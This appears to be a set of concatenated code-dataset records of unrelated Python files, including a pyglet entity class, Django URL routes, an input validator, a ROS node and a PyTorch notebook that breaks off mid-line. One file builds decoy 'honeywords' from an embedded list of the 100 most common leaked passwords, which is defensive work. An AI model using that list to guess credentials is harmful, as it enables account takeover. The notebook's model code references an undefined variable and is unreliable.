how):\n\t\tClaw(who, 'go').modify('where', where).modify('how', Claw('by', how))\n\t\n\t# you do what?\n\n\tClaw('Sam', 'eat', 'rice')\n\tClaw('Joe', 'cook', 'food')\n\tClaw('Nid', 'brew', 'coffee')\n\tClaw('Nui', 'brew', 'tea')\n\tClaw('Sam', 'read', 'book')\n\tClaw('Joe', 'watch', 'movie')\n\tClaw('Nid', 'listen', 'music')\n\tClaw('Joe', 'play', 'game')\n\n\t#chat online\n\t#homework\n\t#work on computer\n\t#work in garden\n\n\tClaw('Sam', 'eat', 'rice').modify('where', Node('house'))\n\tClaw('Joe', 'cook', 'food').modify('where', Node('house').modify('of', 'friend'))\n\tClaw('Nid', 'cook', 'food').modify('where', 'kitchen')\n\tClaw('Joe', 'brew', 'coffee').modify('where', 'backyard')\n\n\tClaw('Nid', 'read', 'book').modify('where', 'upstairs')\n\tClaw('Nui', 'listen', 'music').modify('where', 'bedroom')\n\tClaw('Sam', 'watch', 'movie').modify('where', 'livingroom')\n\tClaw('Nid', 'play', 'game').modify('where', 'backyard')\n\n\t# Why\n\tClaw('Nid', 'cook', 'food').modify('why', Claw(Node('family').modify('of', 'Nid'), 'is', 'hungry'))\n\n\tClaw('Joe', 'brew', 'coffee').modify('why', Claw('Joe', 'relax'))\n\tClaw('Joe', 'brew', 'coffee').modify('why', Claw('Joe','give','friend'))\n\tClaw('Nid', 'read', 'book').modify('why', Claw('Nid', 'have', 'fun'))\n\tClaw('Penny', 'chat', 'online').modify('why', Claw('Penny', 'talk', 'friend'))\n\n\tClaw('Bella', 'do', 'homework').modify( 'why', Claw( 'assignment', 'is', 'due').modify('when', 'tomorrow'))\n\tClaw('Pin', 'do', 'homework').modify( 'why', Claw('Pin', 'study', 'test'))\n\tClaw('May', 'work').modify( 'where', 'computer').modify( 'why', 'job')\n\tClaw('Som', 'work').modify( 'where', 'garden').modify( 'why', Claw( 'weed', 'is', Node('many').modify('howmuch', 'too')))\n\tClaw('Milky', 'work').modify( 'where', 'garden').modify( 'why', Node('time').modify('what', 'harvest'))\n\tClaw('Chompoo', 'work').modify( 'where', 'garden').modify( 'why', Node('time').modify('what', 'plant'))\n\n","sub_path":"python/sam/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"637259511","text":"\"\"\"\nEntity.py: A class representation of an entity in our world. Serves as the superclass for all interactable items.\n\"\"\"\n\nimport math\nfrom math import floor\nfrom uuid import uuid4\nfrom random import random\n\nimport pyglet \nfrom pyglet.gl import glColor4ub, glEnable, glVertexPointer, glDrawArrays, GLfloat, GL_BLEND, GL_POLYGON, GL_VERTEX_ARRAY, glEnableClientState, GL_FLOAT\n\nfrom Util.Vector2 import Vector2\n\nclass Entity(object):\n def __init__(self, **kwargs):\n self.id = uuid4()\n self.color = kwargs.get('color', (int(random() * 255), int(random() * 255), int(random() * 255), 255))\n self.position = kwargs.get('position', Vector2(x = 0, y = 0))\n self.orientation = kwargs.get('orientation', 0)\n self.z_index = kwargs.get('z_index', 0)\n self.vertices = kwargs.get('vertices', [])\n self.abs_vertices = self.get_abs_vertices()\n self.orbital_angle = kwargs.get('orbital_angle', 0)\n self.scale_factor = 1\n\n def update(self):\n self.update_abs_vertices()\n # self.update_relative_vertices()\n\n def update_abs_vertices(self):\n self.abs_vertices = self.get_abs_vertices()\n\n def get_abs_vertices(self):\n vertices = []\n for _ in self.vertices:\n rot_v = _.rotate(self.orientation)\n v = self.position.add(rot_v)\n vertices.append(v)\n\n return vertices\n\n def get_screen_relative_vertices(self, offset_x, offset_y, screen_height):\n x = self.position.x - offset_x\n y = screen_height - self.position.y + offset_y\n\n vertices = ()\n for _ in self.vertices:\n rot_v = _.rotate(self.orientation)\n vertices += (x - rot_v.x * self.scale_factor,)\n vertices += (y + rot_v.y * self.scale_factor,)\n\n\n return vertices\n\n def get_screen_relative_vertices_vectors(self, offset_x, offset_y, screen_height):\n vertices = self.get_screen_relative_vertices(offset_x, offset_y, screen_height)\n\n vectors = [Vector2(x=vertices[i], y=vertices[i+1]) for i in xrange(0, len(vertices), 2)]\n\n return vectors\n\n def draw(self, offset_x, offset_y, screen_height):\n vertices = self.get_screen_relative_vertices(offset_x, offset_y, screen_height)\n \n # get opengl vertices of type GLfloat\n vertices_gl = (GLfloat * len(vertices))(*vertices)\n\n # set the color\n glColor4ub(*self.color);\n\n # turn on blend for alpha channel\n glEnable(GL_BLEND)\n\n # tell open GL were passing a vertex array\n glEnableClientState(GL_VERTEX_ARRAY)\n\n # create a pointer to vertices_gl\n glVertexPointer(2, GL_FLOAT, 0, vertices_gl)\n \n # draw the array\n glDrawArrays(GL_POLYGON, 0, len(vertices) // 2)\n\n # rotates the entity counter clockwise by the angle\n def rotate(self, angle):\n self.orientation += angle\n self.update()\n \n def orbit_around(self, origin, distance, angle):\n self.orbital_angle += angle\n x = origin['x'] + math.cos(self.orbital_angle * math.pi/180) * distance;\n y = origin['y'] + math.sin(self.orbital_angle * math.pi/180) * distance;\n self.position.x = x\n self.position.y = y\n self.update()\n\n def translate_vector(self, vector):\n self.position = self.position.add(vector)\n self.update()\n\n def translate(self, x, y):\n self.translate_vector(Vector2(x = x, y = y))\n self.update()\n\n def scale(self, factor):\n self.scale_factor = factor\n self.update()\n\n def set_position(self, position_vector):\n self.position = position_vector\n self.update()\n","sub_path":"atlas/Entity/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447942123","text":"# What is the 10 001st prime number?\r\ndef isPrime(n):\r\n if (n <= 1):\r\n return False\r\n if (n <= 3):\r\n return True\r\n if (n % 2 == 0 or n % 3 == 0):\r\n return False\r\n i = 5\r\n while(i * i <= n):\r\n if (n % i == 0 or n % (i + 2) == 0):\r\n return False\r\n i = i + 6\r\n return True\r\n\r\nindex = 0\r\nfor i in range(1, 9999999):\r\n if(isPrime(i)):\r\n index += 1\r\n if (index == 10001):\r\n print(i)","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74894621","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\nfrom django.contrib import admin\n\nfrom tastypie.api import Api\n\nfrom hitcount.views import update_hit_count_ajax\n\nfrom minusstore.forms import MinusSearchForm\nfrom minusstore.feeds import LatestArivals\nfrom minusstore.api import MinusRecordResource, MinusAuthorResouce, MinusWeekStatsResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(MinusRecordResource())\nv1_api.register(MinusAuthorResouce())\nv1_api.register(MinusWeekStatsResource())\n\n\nfeeds = {\n 'latest': LatestArivals,\n}\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^minus/', include('minusstore.urls')),\n url(r'^news/', include('news.urls')),\n url(r'^$', 'news.views.news_index'),\n url(r'^blurb/', include('blurbs.urls')),\n url(r'^contest/', include('vocal_contest.urls')),\n url(r'', include('registration.backends.default.urls')),\n url(r'^messages/', include('messages.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^forum/', include('forum.urls')),\n url(r'^friendship/', include('friends.urls')),\n url(r'^photo/', include('photos.urls')),\n url(r'^video/', include('videos.urls')),\n url(r'^albums/', include('albums.urls')),\n url(r'^search/', include('haystack.urls')),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^links/', include('links.urls'),{'form_class':MinusSearchForm}),\n url(r'^captcha/', include('captcha.urls')),\n url(r'^delivery/', include('delivery.urls')),\n url(r'^radio/', include('radio.urls')),\n\n url(r'^chat/', include('chat.urls')),\n url(r'^comments/', include('django.contrib.comments.urls')),\n url(r'^feeds/(?P.*)/$', 'django.contrib.syndication.views.feed',\n {'feed_dict': feeds}, name = \"feeds\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin_tools/', include('admin_tools.urls')),\n (r'^api/', include(v1_api.urls)),\n\n url(r'^ajax/hit/$',\n update_hit_count_ajax,\n name='hitcount_update_ajax'),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes':True}),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590886299","text":"n = int(input())\nlista = []\nscomp = 0\nncomp = 0\nfor i in range(n):\n n2 = input().split(\" \")\n if(n2[0] == '+'):\n scomp = scomp + 1\n if(n2[0] == '-'):\n ncomp = ncomp + 1\n lista.append(n2[1])\nlista = sorted(lista)\nfor i in range(n):\n print(lista[i])\nprint(\"Se comportaram: %d | Nao se comportaram: %d\" %(scomp,ncomp)) \n","sub_path":"URIonlineJudge/Codes/Python/2479.py","file_name":"2479.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344556046","text":"# -*- coding:utf-8 -*-\n\nimport re\n\n\n_re_int = re.compile(\"^\\-?\\d+$\")\n_re_float = re.compile(\"^(\\-?\\d+)(\\.\\d+)?$\")\n_re_email = re.compile(\n \"^([A-Z0-9]+[_|\\_|\\.]?)*[A-Z0-9]+@([A-Z0-9]+[_|\\_|\\.]?)*[A-Z0-9]+\\.[A-Z]{2,3}$\",\n re.I)\n_re_letter_number = re.compile(\"^[\\dA-Z]+$\", re.I)\n\n_message_format = {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n}\n\n\ndef is_int(value):\n u\"\"\"是否整型\n\n Parameters\n ----------\n value : str\n 数值\n\n Returns\n -------\n bool\n\n Notes\n -----\n str.isdigit() 是否只由数字组成,“-”、“.”也不包括\n\n \"\"\"\n if _re_int.match(str(value)):\n return True\n else:\n return False\n\n\ndef is_float(value):\n u\"\"\"是否浮点型\n\n Parameters\n ----------\n value : str\n 数值\n\n Returns\n -------\n bool\n\n \"\"\"\n if _re_float.match(str(value)):\n return True\n else:\n return False\n\n\ndef is_email(value):\n u\"\"\"是否邮件\n\n Parameters\n ----------\n value : str\n 邮件地址\n\n Returns\n -------\n bool\n\n \"\"\"\n if _re_email.match(str(value)):\n return True\n else:\n return False\n\n\ndef only_letters_and_numbers(value):\n u\"\"\"只包含字母、数字\"\"\"\n if _re_letter_number.match(value):\n return True\n else:\n return False\n\n\ndef verify(rules, message_format={}):\n u\"\"\"验证\n\n Parameters\n ----------\n rules : [{str : str}]\n 规则\n\n name : str\n 字段名\n rule : {\n \"required\",\n \"valid_email\",\n \"min_length[x]\",\n \"max_length[x]\",\n \"exact_length[x]\",\n \"matches[x]\",\n \"numeric\",\n \"integer\",\n \"greater_than_or_equal[x]\",\n \"greater_than[x]\",\n \"less_than_or_equal[x]\",\n \"less_than[x]\"}\n 字段规则,x 为比较的值\n value : str\n 字段值\n message_format : dict, optional, default={}\n 错误信息\n\n 默认的错误信息\n {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n }\n\n Returns\n -------\n {str, None}\n 返回错误信息或 None\n\n \"\"\"\n for item in rules:\n rule = item.get(\"rule\")\n name = item.get(\"name\")\n value = item.get(\"value\")\n\n rule_name = rule.split(\"[\")[0]\n if rule == rule_name:\n rule_value = None\n else:\n rule_value = rule.split(\"[\")[1].split(\"]\")[0]\n\n message_exists = False\n\n if rule_name == \"required\":\n if value == \"\":\n message_exists = True\n elif rule_name == \"valid_email\":\n if not is_email(value):\n message_exists = True\n elif rule_name == \"numeric\":\n if not is_float(value):\n message_exists = True\n elif rule_name == \"integer\":\n if not is_int(value):\n message_exists = True\n elif rule_name == \"min_length\":\n if len(value) < int(rule_value):\n message_exists = True\n elif rule_name == \"max_length\":\n if len(value) > int(rule_value):\n message_exists = True\n elif rule_name == \"exact_length\":\n if len(value) != int(rule_value):\n message_exists = True\n elif rule_name == \"matches\":\n if value != rule_value:\n message_exists = True\n elif rule_name == \"greater_than_or_equal\":\n if float(value) < float(rule_value):\n message_exists = True\n elif rule_name == \"greater_than\":\n if float(value) <= float(rule_value):\n message_exists = True\n elif rule_name == \"less_than_or_equal\":\n if float(value) > float(rule_value):\n message_exists = True\n elif rule_name == \"less_than\":\n if float(value) >= float(rule_value):\n message_exists = True\n\n if message_exists:\n if rule_name in message_format:\n msg_format = message_format[rule_name]\n else:\n msg_format = _message_format[rule_name]\n\n if msg_format.count(\"{}\") == 2:\n return msg_format.format(name, rule_value)\n else:\n return msg_format.format(name)\n\n return None\n\n\ndef verify_page(page, row, extend=None, message_format={}):\n u\"\"\"验证分页\n\n Parameters\n ----------\n page : int\n 页码\n row : int\n 每页数据数\n extend : [{str : str}]\n 扩展规则\n\n name : str\n 字段名\n rule : {\n \"required\",\n \"valid_email\",\n \"min_length[x]\",\n \"max_length[x]\",\n \"exact_length[x]\",\n \"matches[x]\",\n \"numeric\",\n \"integer\",\n \"greater_than_or_equal[x]\",\n \"greater_than[x]\",\n \"less_than_or_equal[x]\",\n \"less_than[x]\"}\n 字段规则,x 为比较的值\n value : str\n 字段值\n message_format : dict, optional, default={}\n 错误信息\n\n 默认的错误信息\n {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n }\n\n Returns\n -------\n {str, None}\n\n \"\"\"\n rules = [\n {\n \"name\": \"page\",\n \"rule\": \"numeric\",\n \"value\": page\n },\n {\n \"name\": \"row\",\n \"rule\": \"numeric\",\n \"value\": row\n },\n {\n \"name\": \"page\",\n \"rule\": \"greater_than[0]\",\n \"value\": page\n },\n {\n \"name\": \"row\",\n \"rule\": \"greater_than[0]\",\n \"value\": row\n }\n ]\n\n if extend is not None:\n rules += extend\n\n return verify(rules, message_format)\n","sub_path":"nlptools/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297704730","text":"#!/usr/bin/env python2.7\n\nimport rospy\nimport tf\nfrom std_msgs.msg import Float64\n\n\nclass PoseNode(object):\n '''Node responsible for republishing X and Y components of pose on independent topics for PID\n controllers'''\n\n def __init__(self, transform_target='world', transform_source='base_link'):\n self.transform_target = transform_target\n self.transform_source = transform_source\n self.pub_x = rospy.Publisher('x_pid', Float64, queue_size=10)\n self.pub_y = rospy.Publisher('y_pid', Float64, queue_size=10)\n self.listen = tf.TransformListener()\n\n def broadcaster(self):\n '''Listen for pose transform and republish coordinates once'''\n try:\n pos, _ = self.listen.lookupTransform(self.transform_target, self.transform_source,\n rospy.Time(0))\n self.pub_x.publish(pos[0])\n self.pub_y.publish(pos[1])\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as err:\n rospy.logerr(\"Failed to lookup transform between {} and {}! Got error: {}\".format(\n self.transform_source, self.transform_target, err))\n\n def wait(self):\n '''Wait for the pose transform to start publishing'''\n rospy.loginfo('Waiting for transform...')\n self.listen.waitForTransform(self.transform_target, self.transform_source, rospy.Time(),\n rospy.Duration(5))\n\n\nif __name__ == '__main__':\n rospy.init_node('pose_node')\n P = PoseNode()\n P.wait()\n while not rospy.is_shutdown():\n P.broadcaster()\n","sub_path":"pose_node.py","file_name":"pose_node.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547126917","text":"from random import randint\r\n\r\ntop100 = [\r\n '123456',\r\n '12345',\r\n '123456789',\r\n 'password',\r\n 'iloveyou',\r\n 'princess',\r\n '1234567',\r\n 'rockyou',\r\n '12345678',\r\n 'abc123',\r\n 'nicole',\r\n 'daniel',\r\n 'babygirl',\r\n 'monkey',\r\n 'lovely',\r\n 'jessica',\r\n '654321',\r\n 'michael',\r\n 'ashley',\r\n 'qwerty',\r\n '111111',\r\n 'iloveu',\r\n '000000',\r\n 'michelle',\r\n 'tigger',\r\n 'sunshine',\r\n 'chocolate',\r\n 'password1',\r\n 'soccer',\r\n 'anthony',\r\n 'friends',\r\n 'butterfly',\r\n 'purple',\r\n 'angel',\r\n 'jordan',\r\n 'liverpool',\r\n 'justin',\r\n 'loveme',\r\n 'fuckyou',\r\n '123123',\r\n 'football',\r\n 'secret',\r\n 'andrea',\r\n 'carlos',\r\n 'jennifer',\r\n 'joshua',\r\n 'bubbles',\r\n '1234567890',\r\n 'superman',\r\n 'hannah',\r\n 'amanda',\r\n 'loveyou',\r\n 'pretty',\r\n 'basketball',\r\n 'andrew',\r\n 'angels',\r\n 'tweety',\r\n 'flower',\r\n 'playboy',\r\n 'hello',\r\n 'elizabeth',\r\n 'hottie',\r\n 'tinkerbell',\r\n 'charlie',\r\n 'samantha',\r\n 'barbie',\r\n 'chelsea',\r\n 'lovers',\r\n 'teamo',\r\n 'jasmine',\r\n 'brandon',\r\n '666666',\r\n 'shadow',\r\n 'melissa',\r\n 'eminem',\r\n 'matthew',\r\n 'robert',\r\n 'danielle',\r\n 'forever',\r\n 'family',\r\n 'jonathan',\r\n '987654321',\r\n 'computer',\r\n 'whatever',\r\n 'dragon',\r\n 'vanessa',\r\n 'cookie',\r\n 'naruto',\r\n 'summer',\r\n 'sweety',\r\n 'spongebob',\r\n 'joseph',\r\n 'junior',\r\n 'softball',\r\n 'taylor',\r\n 'yellow',\r\n 'daniela',\r\n 'lauren',\r\n 'mickey',\r\n 'princesa']\r\n \r\ndef symbol_suffix():\r\n \"\"\"\r\n adds a random common string to the end of a password\r\n \"\"\"\r\n r = randint(1,100)\r\n password = top100[r]\r\n special_symbol = [33,35,36,38,42,63]\r\n length = len(special_symbol)-1\r\n rand = randint(0,length)\r\n suffix = chr(special_symbol[rand])\r\n honeyword = password + suffix\r\n return honeyword\r\n\r\n#print symbol_suffix()\r\n","sub_path":"symbol_suffix.py","file_name":"symbol_suffix.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"82213099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## A Dense Neural network with Word2Vec embedding trained on pubmed abstracts\n\n# In[1]:\n\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nimport gensim.models as word2vec\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport time\nimport random\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data.sampler import SequentialSampler\nimport pickle\n\n\n# In[2]:\n\n\n# Reproducibility\nmanualSeed = 42\n\nnp.random.seed(manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n# if you are suing GPU\nprint(\"Torch is available:\",torch.cuda.is_available())\nif torch.cuda.is_available():\n torch.cuda.manual_seed(manualSeed)\n torch.cuda.manual_seed_all(manualSeed)\n\n\n torch.backends.cudnn.enabled = False \n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\n# In[3]:\n\n\nprint (os.getcwd())\nos.chdir('')\nprint (os.getcwd())\n\n\n# In[4]:\n\n\nembedding = \"data/embeddings/pubmed_s100w10_min.bin\"\ndata = \"\"\n\n\n# In[5]:\n\n\n\n# #Load pretrained model (since intermediate data is not included, the model cannot be refined with additional data)\n# #model = Word2Vec.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True, norm_only=True)\n\n\n# import gensim\n# model = word2vec.KeyedVectors.load_word2vec_format(embedding, binary=True)\n\n# # Deal with an out of dictionary word: Михаил (Michail)\n# if 'cholangiocarcinoma' in model:\n# print(model['cholangiocarcinoma'].shape)\n# else:\n# print('{0} is an out of dictionary word'.format('cholangiocarcinoma'))\n \n# print(model.most_similar(positive=['woman', 'king'], negative=['man']))\n\n# print(model.doesnt_match(\"breakfast cereal dinner lunch\".split()))\n\n# print(model.similarity('woman', 'man'))\n\n# print(model.most_similar('cholangiocarcinoma'))\n# print(model.most_similar('Tamoxifen'))\n\n\n# ### DataLoader Class\n\n# In[6]:\n\n\nimport src.data.DataLoader as CustomDataLoader\nfrom src.features.CustomTokenizer import CustomTokenizer\n\n\n# In[7]:\n\n\nmaxSentenceLen = 15\nembedDim = 100\ntrain_split = .7\nvalidation_split = .2\ntest_split = .1\n\n\n# ### MESSY LOADER : TODO CLEANUPS\n\n# In[8]:\n\n\nclass ClinicalSTS(Dataset):\n ''' Class to Load STS data '''\n \n def __init__(self, typeData):\n \n zeroTensor = torch.zeros(100)\n \n ''' Load Pretrained Word2Vec Model '''\n preTrainedWord2Vec = word2vec.KeyedVectors.load_word2vec_format(embedding, binary=True)\n\n ''' Load the data from the file '''\n #data = pd.read_csv(file, delimiter=\"\\t\", header=None,names=['a','b','score'])\n #fullData = np.loadtxt(data, delimiter='\\t')\n pairs = CustomDataLoader.DataLoader()\n # Pairs will have the whole data in list of tupples {a, b, score}\n# print (len(pairs))\n# print (pairs[3][0], pairs[3][1],pairs[3][2])\n# print(CustomTokenizer(pairs[3][0]))\n# print(CustomTokenizer(pairs[3][1]))\n# print(pairs[3][2])\n\n #TODO: Provide full data\n textData = pairs\n self.dataSize = len(textData)\n #print (self.dataSize)\n #self.len = self.dataSize\n \n ''' Get the Tokenization and embeddings '''\n aData = []\n bData = []\n labels = []\n for eachData in tqdm(textData):\n a = CustomTokenizer(eachData[0])\n b = CustomTokenizer(eachData[1])\n label = float(eachData[2])\n aEmbed = []\n bEmbed = []\n for eachToken in a:\n if eachToken in preTrainedWord2Vec:\n aEmbed.append(preTrainedWord2Vec[eachToken])\n else:\n if \" \" in eachToken:\n for splitEachToken in eachToken.split():\n aEmbed.append(preTrainedWord2Vec[splitEachToken])\n else:\n print(\"A:\",eachToken)\n \n if len(aEmbed) < maxSentenceLen:\n aEmbed += [zeroTensor] * (maxSentenceLen - len(aEmbed))\n elif len(aEmbed) > maxSentenceLen:\n aEmbed = aEmbed[:maxSentenceLen]\n \n for eachToken in b:\n if eachToken in preTrainedWord2Vec:\n bEmbed.append(preTrainedWord2Vec[eachToken])\n else:\n if \" \" in eachToken:\n for splitEachToken in eachToken.split():\n bEmbed.append(preTrainedWord2Vec[splitEachToken])\n else:\n print(\"B:\",eachToken)\n \n if len(bEmbed) < maxSentenceLen:\n bEmbed += [zeroTensor] * (maxSentenceLen - len(bEmbed))\n elif len(bEmbed) > maxSentenceLen:\n bEmbed = bEmbed[:maxSentenceLen]\n \n aData.append(aEmbed)\n bData.append(bEmbed)\n labels.append(label)\n \n \n #Check shapes and sizes\n print (len(aData), len(bData), len(labels))\n print (len(aData[3]), len (bData[3]), len (aData[3][0]),type(aData[3][0]))\n \n ''' Convert to Tensors'''\n aDataTensor = torch.FloatTensor(aData)\n bDataTensor = torch.FloatTensor(bData)\n labels = torch.FloatTensor(labels)\n print (aDataTensor.shape, bDataTensor.shape, labels.shape)\n \n xData = torch.cat((aDataTensor,bDataTensor),1)\n print (xData.shape)\n \n splitVal = int(np.floor(validation_split * self.dataSize))\n splitTest = int(np.floor(test_split * self.dataSize))\n splitTrain = xData.shape[0] - (splitVal + splitTest)\n# self.xVal, self.yVal = xData[:splitVal], labels[:splitVal]\n# self.xTest, self.yTest = xData[splitVal: splitVal+splitTest], labels[splitVal: splitVal+splitTest]\n# self.xTrain, self.yTrain = xData[splitVal+splitTest:], labels[splitVal+splitTest:]\n self.xVal, self.yVal = xData[splitTrain:splitTrain+splitVal], labels[splitTrain:splitTrain+splitVal]\n self.xTest, self.yTest = xData[splitTrain+splitVal:], labels[splitTrain+splitVal:]\n self.xTrain, self.yTrain = xData[:splitTrain], labels[:splitTrain]\n \n print (len(self.xTrain),len(self.xVal),len(self.xTest))\n print (splitVal, splitTest)\n \n if typeData == \"train\":\n self.xData = self.xTrain\n self.labels = self.yTrain\n elif typeData == \"test\":\n self.xData = self.xTest\n self.labels = self.yTest\n else:\n self.xData = self.xVal\n self.labels = self.yVal\n self.len = len(self.xData)\n print (len(self.xData),len(self.labels))\n\n \n def __getitem__(self, index):\n return self.xData[index], self.labels[index]\n \n def __len__(self):\n return self.len\n\n\n# ### Define Train and Test Loader\n\n# In[9]:\n\n\nstime = time.time()\ndatasetTrain = ClinicalSTS('train')\nprint(\"Time:\",time.time()- stime)\n\nstime = time.time()\ndatasetTest = ClinicalSTS('test')\nprint(\"Time:\",time.time()- stime)\n\nstime = time.time()\ndatasetVal = ClinicalSTS('val')\nprint(\"Time:\",time.time()- stime)\n\n\n# In[10]:\n\n\nbatchSize = 64\n\ntrainLoader = torch.utils.data.DataLoader(datasetTrain, batch_size=batchSize,shuffle=False)\nvalidationLoader = torch.utils.data.DataLoader(datasetVal, batch_size=batchSize,shuffle=False)\ntestLoader = torch.utils.data.DataLoader(datasetTest, batch_size=batchSize,shuffle=False)\n\n\n# In[11]:\n\n\nprint (len(trainLoader), len(validationLoader), len(testLoader))\n\n\n# In[12]:\n\n\nprint (len(trainLoader.dataset), len(validationLoader.dataset), len(testLoader.dataset))\n\n\n# ### Model Class\n\n# In[55]:\n\n\nclass DNN(nn.Module):\n ''' A Dense Neural Network '''\n \n def __init__(self):\n super().__init__()\n self.reducedDim = 100\n self.modelName = \"DNN_1Lyr_cW2V\"\n self.la = nn.Linear(maxSentenceLen*embedDim,self.reducedDim)\n self.lb = nn.Linear(maxSentenceLen*embedDim,self.reducedDim)\n self.l1 = nn.Linear(2*self.reducedDim,1)\n \n def forward(self, x):\n \"\"\" Layer Stacking and Logic Core \"\"\"\n print (\"Before:\",x.shape)\n splitX = torch.split(x, maxSentenceLen, dim=1)\n a = splitX[0].view(-1, maxSentenceLen*embedDim)\n b = splitX[1].view(-1, maxSentenceLen*embedDim) #n,15*100\n print (\"b:\",b.shape)\n \n outla = self.la(a)\n outlb = self.lb(b) #n, 100\n print (\"Outa,Outb:\",outla.data.shape)\n outlab = torch.cat((outla,outlb),1)\n yPred = self.l1(ab)\n input(\"WAIT\")\n #print (x.shape)\n return yPred\n \n\n\n# ### Define Models, Loss, Optimizer\n\n# In[56]:\n\n\nmodel = DNN()\n\n\n# In[57]:\n\n\nlossCriterion = nn.MSELoss(reduction='mean')\noptimizer = torch.optim.SGD(model.parameters(),lr=0.001)\n\n\n# ## Training\n\n# In[58]:\n\n\ndef train(epoch):\n model.train()\n loss = 0\n for batchIdx, data in enumerate(trainLoader):\n xTrain, labels = data\n yPred = model(xTrain)\n labels = labels.view(-1,1)\n #print (xTrain.shape,yPred.shape, labels.shape)\n loss = lossCriterion(yPred, labels)\n if batchIdx %10 == 0:\n print (\"Epoch : {}, Batch : {}, Progress:{:.2f}% Loss: {:.6f}\".format(epoch,batchIdx,batchIdx * 100./len(trainLoader), loss.data))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n# ## Testing \n\n# In[59]:\n\n\n#outpath = os.path.join(\"output/\",model.modelName)\noutpath = os.path.join(\"output/\",\"DNN_1Lyr_cW2V\")\n\n\n# In[60]:\n\n\ndef test(loader, model=model):\n# if isVal:\n# loader = validationLoader\n# else:\n# loader = testLoader\n model.eval()\n testloss = 0\n allPredValue = []\n for batchIdx, data in enumerate(loader):\n xVal, labels = data\n yPred = model(xVal)\n labels = labels.view(-1,1)\n testloss += lossCriterion(yPred, labels).data\n allPredValue.append((labels.data.squeeze(),yPred.data.squeeze()))\n \n testloss /= len(loader)\n \n # print (\"Average Loss: \",loss.data)\n \n return allPredValue, testloss.data\n \n\n\n# In[61]:\n\n\n# Write results\ndef results(typeData, output, loss, epoch):\n \n \n gsc = os.path.join(outpath,typeData+\"gs.txt\")\n sys = os.path.join(outpath,typeData+\"sys.txt\")\n results = os.path.join(outpath,typeData+\"result.txt\")\n \n rs = open(results,'w')\n rs.write(\"Epoch:{},\\n Loss:{:.4f}\\n\".format(epoch,loss))\n rs.close()\n \n \n g = open(gsc,'w')\n s = open(sys,'w')\n\n for gs,ps in output:\n for eachGs, eachPs in zip(gs,ps):\n #print (eachGs.item(), eachPs.item() )\n g.write(str(round(eachGs.item(),2))+\"\\n\")\n s.write(str(round(np.clip(eachPs.item(),0,5),2))+\"\\n\")\n \n g.close()\n s.close()\n \n\n\n# In[62]:\n\n\nepochs = 10\nisVal = True\nprevLoss = 0\nevalloss = 0\n\n# 1 - valid\n# 2 - test\n# 3 - train\n\n\nfor eachEpoch in range(1,epochs):\n train(eachEpoch)\n output, evalloss = 